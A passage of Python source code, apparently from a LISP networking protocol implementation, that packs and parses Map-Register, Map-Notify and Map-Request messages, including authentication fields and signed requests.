self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
